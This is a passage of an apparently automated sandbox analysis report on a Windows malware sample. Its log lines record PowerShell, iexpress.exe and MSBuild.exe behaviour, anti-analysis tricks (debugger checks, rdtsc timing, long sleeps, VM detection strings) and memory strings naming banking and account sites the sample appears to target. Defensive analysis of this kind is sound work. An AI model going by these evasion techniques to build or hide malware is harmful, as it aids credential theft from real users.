                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762D324
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762D7E4
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762D944
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762D504
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762D544
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762D1E4
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B7630154
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI/Special instruction interceptor: Address: 7FF9B762DA44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD1C0 rdtsc 10_2_01ABD1C0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1354Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1670Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3802Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5990Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3819Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4590Jump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeWindow / User API: threadDelayed 1048Jump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeWindow / User API: threadDelayed 8925Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\iexpress.exeAPI coverage: 3.2 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 3802 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 5990 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep count: 3819 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep count: 4590 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep count: 1048 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep time: -2096000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep count: 8925 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812Thread sleep time: -17850000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5816Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe TID: 7728Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\iexpress.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\iexpress.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EDC9A0 FindFirstFileW,FindNextFileW,FindClose,12_2_02EDC9A0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 5z722a.12.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: discord.comVMware20,11696494690f
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696494690p
                  Source: 5z722a.12.drBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: svchost.exe, 0000000D.00000002.2230591207.0000017B01A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                  Source: 5z722a.12.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: 5z722a.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: 5z722a.12.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: svchost.exe, 0000000D.00000002.2235238818.0000017B07058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,116
                  Source: 5z722a.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: powershell.exe, 00000007.00000002.1185379054.000002357C790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1.%SystemRoot%\system32\mswsock.dlltem32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cats|5
                  Source: 5z722a.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: 5z722a.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: 5z722a.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: powershell.exe, 00000008.00000002.1108214345.0000015DA88A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.1567529480.000001851E9DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: 5z722a.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: 5z722a.12.drBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,1169649469?
                  Source: iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj'MY
                  Source: 5z722a.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696-
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ca.comVMware20,11696494690x
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.office.comVMware20,11696494690o
                  Source: DmMVOWsP1JSI77P.exe, 00000014.00000002.2229057165.00000000012A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                  Source: 5z722a.12.drBinary or memory string: global block list test formVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D902A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                  Source: 5z722a.12.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: 5z722a.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: iexpress.exe, 0000000C.00000002.2234210512.000000000800F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: 5z722a.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: 5z722a.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: 5z722a.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01ABD1C0 rdtsc 10_2_01ABD1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00417BF3 LdrLoadDll,10_2_00417BF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF11A4 mov eax, dword ptr fs:[00000030h]10_2_01AF11A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF11A4 mov eax, dword ptr fs:[00000030h]10_2_01AF11A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF11A4 mov eax, dword ptr fs:[00000030h]10_2_01AF11A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AF11A4 mov eax, dword ptr fs:[00000030h]10_2_01AF11A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5B1B0 mov eax, dword ptr fs:[00000030h]10_2_01A5B1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFC188 mov eax, dword ptr fs:[00000030h]10_2_01AFC188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFC188 mov eax, dword ptr fs:[00000030h]10_2_01AFC188
